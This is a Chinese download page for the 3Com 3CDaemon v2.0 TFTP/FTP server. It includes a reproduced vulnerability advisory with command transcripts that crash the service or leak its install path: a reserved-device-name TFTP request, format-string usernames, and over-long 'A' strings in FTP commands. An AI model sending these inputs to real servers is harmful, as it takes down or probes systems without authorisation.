3com 3cdaemon中文版  v2.0

3com 3cdaemon中文版

版本:v2.0

大小:243.17KB

类别:网络工具

时间:2022-02-11

软件介绍

  • 3com 3cdaemon中文版

    3com 3cdaemon中文版是一款非常方便实用的服务器工具,软件结合了tftp、ftp等多种功能,用户可以通过3com 3cdaemon中文版来管理自己的服务器,其软件的优势在于速度非常迅速,并且非常稳定,对于临时急用的朋友来说是一个非常不错的选择,有需要的朋友可以来看看。

    3COM 3CDaemon问题详解

    1、TFTP保留设备名拒绝服务攻击

    提交类似如下的请求,可导致TFTP服务程序挂起:

    D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn

    The 3CDaemon will be crashed with some msgs like

    "Microsoft Visual C++ Runtime library"

    "Runtime Error!"

    "Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "

    "abnormal program termination".

    3COM 3CDaemon

    2、FTP用户名存在格式串问题

    提交包含格式串字符作为用户名数据,可导致守护程序崩溃:

    H:\>ftp 192.168.0.1

    Connected to 192.168.0.1.

    220 3Com 3CDaemon FTP Server Version 2.0

    User (192.168.0.1:(none)): %n

    Connection closed by remote host.

    OR:

    H:\>ftp 192.168.0.1

    Connected to 192.168.0.1.

    220 3Com 3CDaemon FTP Server Version 2.0

    User (192.168.0.1:(none)): %s

    331 User name ok, need password

    Password:[anythinghere]

    530 Login access denied

    Login failed.

    ftp>

    3、FTP超长用户名缓冲区溢出

    由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:

    D:\WINDOWS\system32>ftp 192.168.0.1

    Connected to 192.168.0.1.

    220 3Com 3CDaemon FTP Server Version 2.0

    User (192.168.0.1:(none)):

    501 Invalid or missing parameters

    Login failed.

    ftp> user AAA..[about 241 A here]...AAAAA

    Connection closed by remote host.

    4、多个FTP命令超长参数缓冲区溢出

    cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:

    ftp> cd AAA..[about 398 A here]...AAAAA

    Connection closed by remote host.

    ftp>

    ftp> ls AAA..[about 247 A here]...AAAAA

    200 PORT command successful.

    Connection closed by remote host.

    ftp> put 1.txt AAA..[about 247 A here]...AAAAA

    200 PORT command successful.

    532 Need account for storing files

    Connection closed by remote host.

    5、多个FTP命令存在格式串问题

    提交格式字符串作为参数,可导致程序崩溃。

    6、多个FTP命令包设备名信息泄露问题

    请求保留设备名可导致返回程序安装路径信息:

    ftp> cd aux

    550 aux : C:/3cdaemon/aux is not a directory!

    ftp> cd lpt1

    550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

    受影响系统:

    3Com 3CDaemon 2.0 revision 10

    3com 3cdaemon中文版测评

    3com 3cdaemon中文版这款软件速度上可以说在众多FTP工具中能够排名前列的工具了,不过缺点也非常明显,漏洞过多,安全新偏低,临时应急还是非常不错的。

    手游排行榜

    • 最新排行
    • 最热排行
    • 评分最高